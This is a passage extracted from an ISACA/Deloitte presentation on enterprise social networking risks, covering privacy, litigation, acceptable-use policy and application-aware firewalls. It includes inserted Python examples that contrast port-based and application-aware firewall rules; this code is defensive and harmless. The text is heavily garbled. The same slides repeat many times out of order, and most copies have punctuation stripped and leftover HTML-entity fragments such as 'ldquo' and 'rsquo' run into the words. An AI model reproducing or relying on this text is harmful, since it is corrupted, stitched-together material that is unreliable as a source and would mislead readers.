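    "twitter.com": "twitter",
    "crm.example-saas.com": "crm",
}

# Constructed policy: group -> application -> permitted functions.
APP_POLICY = {
    "marketing": {"facebook": {"browse", "post"}, "twitter": {"browse", "post"},
                  "crm": {"browse", "post"}},
    "engineering": {"facebook": {"browse"}, "twitter": {"browse"},
                    "crm": {"browse", "post"}},
}


def identify_app(sni: str) -> str:
    """Classify by server name, independent of the destination port."""
    host = sni.lower().rstrip(".")
    for suffix, app in APP_SIGNATURES.items():
        if host == suffix or host.endswith("." + suffix):
            return app
    return "unknown"


def identify_function(flow: Flow) -> str:
    """Coarse function split: anything that writes content counts as a post."""
    return "post" if flow.method in ("POST", "PUT", "PATCH") else "browse"


def port_policy(flow: Flow) -> str:
    """Legacy rule set: web ports allowed, everything else denied."""
    return "allow" if flow.dst_port in (80, 443) else "deny"


def app_policy(flow: Flow) -> str:
    """Application- and user-aware decision with default deny for the unidentified."""
    user = USER_BY_IP.get(flow.src_ip)
    group = GROUP_BY_USER.get(user)
    app = identify_app(flow.sni)
    if group is None or app == "unknown":
        return "deny"   # unknown user or application: deny and log for review
    allowed = APP_POLICY[group].get(app, set())
    return "allow" if identify_function(flow) in allowed else "deny"


def evaluate(flows):
    """Return (user, app, function, port decision, app-aware decision) per flow."""
    return [(USER_BY_IP.get(f.src_ip, "?"), identify_app(f.sni),
             identify_function(f), port_policy(f), app_policy(f)) for f in flows]


# Constructed sample traffic.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", 443, "www.facebook.com", "POST", "/compose"),       # marketing posts
    Flow("10.0.0.9", 443, "www.facebook.com", "POST", "/compose"),       # engineer posts
    Flow("10.0.0.9", 443, "www.facebook.com", "GET", "/"),               # engineer browses
    Flow("10.0.0.12", 443, "crm.example-saas.com", "POST", "/api/leads"),  # business app
    Flow("10.0.0.12", 8443, "www.facebook.com", "GET", "/"),             # non-standard port
    Flow("10.0.0.99", 443, "www.twitter.com", "GET", "/"),               # unmapped address
]

if __name__ == "__main__":
    for row in evaluate(SAMPLE_FLOWS):
        print("user=%-6s app=%-9s func=%-6s port-rule=%-5s app-aware=%s" % row)
```

Rows two, three and four all look identical to the port rule (443, allow), which is exactly why it cannot express "engineers may read but not post" or tell the CRM apart from Facebook.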
www.isaca.org 53
What is next in the world of social networking

www.isaca.org 54
Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle" – http://en.wikipedia.org/wiki/Hype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
www.isaca.org 48

A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
www.isaca.org 49

A quick word on privacy (cont.)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
www.isaca.org 50

Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
www.isaca.org 51

Responding to the risks and challenges

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52

Responding to the risks and challenges (cont.)

• Vulnerability assessments
  – Identifying, quantifying, and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses, and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic, or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
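To make the firewall point concrete, the following is an added example (not code from the ISACA/Deloitte deck) contrasting a legacy port-based rule set with an application- and user-aware rule set of the kind the slide describes. The application labels (`facebook`, `web-browsing`), sub-function labels (`base`, `file-sharing`), user names and directory groups are constructed sample values; in a real deployment they would come from the firewall's own application-identification and user-identification engines (whether the app label is obtained on encrypted traffic via TLS inspection or otherwise is outside this example).

```python
"""Port-based vs application-aware policy evaluation (added example).

Shows why a rule set keyed on destination port cannot distinguish social
networking from ordinary web browsing (both ride on 80/443), and how an
app- and user-aware rule set gives the granular control the slide lists.
All flow attributes below are constructed sample data.
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Flow:
    src_ip: str
    dst_port: int
    user: str       # from user identification (directory integration), not from IP
    group: str      # user's directory group
    app: str        # application label assumed to come from the app-ID engine
    function: str   # sub-function the app-ID engine detected (e.g. "file-sharing")


def legacy_port_policy(flow: Flow) -> str:
    """Legacy rule: decide on port only. Social networking on 443 looks like any
    other HTTPS session, so this rule set cannot apply granular control."""
    return "allow" if flow.dst_port in (80, 443) else "deny"


@dataclass(frozen=True)
class AppRule:
    app: str        # application label, or "*" for any
    function: str   # sub-function, or "*" for any
    group: str      # directory group, or "*" for any
    action: str     # "allow" or "deny"


# Ordered next-generation rule set, first match wins, default deny.
# Ports never appear: matching is on application, function and user group.
NGFW_RULES: List[AppRule] = [
    AppRule("facebook", "file-sharing", "*", "deny"),   # no uploads for anyone
    AppRule("facebook", "*", "marketing", "allow"),      # marketing may use Facebook
    AppRule("facebook", "*", "*", "deny"),               # everyone else: no Facebook
    AppRule("web-browsing", "*", "*", "allow"),          # generic browsing allowed
]


def _matches(pattern: str, value: str) -> bool:
    return pattern == "*" or pattern == value


def ngfw_policy(flow: Flow, rules: List[AppRule] = NGFW_RULES) -> str:
    """Application-aware rule: evaluated regardless of destination port."""
    for rule in rules:
        if (_matches(rule.app, flow.app)
                and _matches(rule.function, flow.function)
                and _matches(rule.group, flow.group)):
            return rule.action
    return "deny"


# Constructed sample flows (not captured traffic).
SAMPLE_FLOWS: List[Flow] = [
    Flow("10.0.0.5", 443, "alice", "marketing", "facebook", "base"),
    Flow("10.0.0.6", 443, "bob", "finance", "facebook", "base"),
    Flow("10.0.0.5", 443, "alice", "marketing", "facebook", "file-sharing"),
    Flow("10.0.0.7", 443, "carol", "finance", "web-browsing", "base"),
    Flow("10.0.0.8", 8443, "dave", "marketing", "facebook", "base"),  # non-standard port
]


def compare(flows: List[Flow] = SAMPLE_FLOWS) -> List[Tuple[str, str, str, str, str]]:
    """Return (user, app, function, legacy verdict, NGFW verdict) per flow."""
    return [(f.user, f.app, f.function, legacy_port_policy(f), ngfw_policy(f))
            for f in flows]


def missed_by_port_rules(flows: List[Flow] = SAMPLE_FLOWS) -> List[str]:
    """Flows the port-only rules let through but the app-aware rules deny.
    This gap is what a social-networking vulnerability assessment should surface."""
    return [f"{f.user}:{f.app}/{f.function}" for f in flows
            if legacy_port_policy(f) == "allow" and ngfw_policy(f) == "deny"]


if __name__ == "__main__":
    for row in compare():
        print(row)
    print("missed by port rules:", missed_by_port_rules())
```

Running the block shows that the port-only rules allow every 443 flow, including Bob's non-marketing Facebook use and Alice's file upload, while the application-aware rules deny both and, conversely, still recognise Dave's Facebook session on port 8443 as a permitted marketing flow.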
www.isaca.org 53

What is next in the world of social networking
www.isaca.org 54

Where we are at today

• Enterprise social media has crossed the tipping point and is no longer considered an "emerging" technology.
  "The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle
www.isaca.org 55

What's next in the world of social networking

• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them.
www.isaca.org 56

Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war." — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… Something important that has the potential to change the world, though we have a long way to go." — Biz Stone, Co-founder of Twitter
www.isaca.org 57

Q&A
www.isaca.org 58

Today's Presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
www.isaca.org 59

Appendix

• Additional resources
  – Gopal, Raj, et al. "Web 2.0 reinvents corporate networking," Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, "January 30, 2010"
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
www.isaca.org 60

This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax, or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates, and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
